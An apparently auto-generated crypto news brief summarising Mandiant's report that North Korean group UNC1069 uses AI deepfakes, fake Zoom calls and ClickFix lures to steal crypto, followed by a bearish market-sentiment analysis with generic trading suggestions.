Google/Mandiant: North Korean Hackers Using AI Deepfakes to Target Crypto and DeFi

Published: 2026-02-10 16:27:05 |

Google Cloud’s Mandiant warns that North Korean–linked threat actor UNC1069 (CryptoCore) is using AI-generated deepfakes, spoofed Zoom meetings, compromised messaging accounts and ClickFix social engineering to target cryptocurrency firms, developers and venture capital personnel. Mandiant investigated a fintech intrusion where a compromised Telegram account led to a Calendly invite for a fake Zoom call; during the call attackers displayed an AI deepfake of a known crypto CEO and instructed the victim to run “troubleshooting” commands that deployed seven malware families to harvest credentials, session tokens and browser data. Chainalysis data cited in the reporting shows DPRK-linked groups stole about $2.02 billion in crypto in 2025 (a 51% year-over-year increase), bringing total DPRK-related thefts to roughly $6.75 billion. Experts warn the shift from mass phishing to highly targeted AI-enabled social engineering increases the risk to trusted digital identities, making calendar invites, video calls and routine communications attractive attack vectors. Key SEO keywords: AI deepfake, North Korean hackers, crypto theft, DeFi security, UNC1069, Mandiant. The report urges traders and firms to strengthen identity verification, multi-factor authentication, session-token protection and phishing-resistant procedures for virtual meetings.

Bearish

This news is bearish for crypto market sentiment and trading risk. High-profile, state-linked attacks using AI deepfakes and targeted social engineering raise counterparty and custodial risks, increasing perceived operational risk across exchanges, custody providers, venture firms and developer teams. Immediate effects: heightened risk aversion may increase sell-side pressure on affected tokens and projects, prompt short-term outflows from centralized platforms, and raise volatility in assets tied to targeted firms. Traders may reduce leverage and widen spreads due to increased tail-risk concerns. Medium-to-long term: if attacks continue, market participants will price in higher operational and regulatory risk, potentially reducing capital inflows into DeFi projects and startups and increasing demand for more secure custody solutions (a partial bullish offset for security and custody service tokens). Historical parallels: prior DPRK-linked heists (eg. North Korean-linked Lazarus campaigns and 2022-2023 bridge/exchange hacks) produced immediate market draws of liquidity, temporary price drops for targeted assets, and longer-term shifts toward regulated custodians and stricter onboarding. Recommended trader actions: reduce leverage, audit counterparties, monitor announcements from exchanges and major DeFi protocols for compromised keys or token freezes, and consider hedges (stablecoins, inverse products) until systemic risk recedes.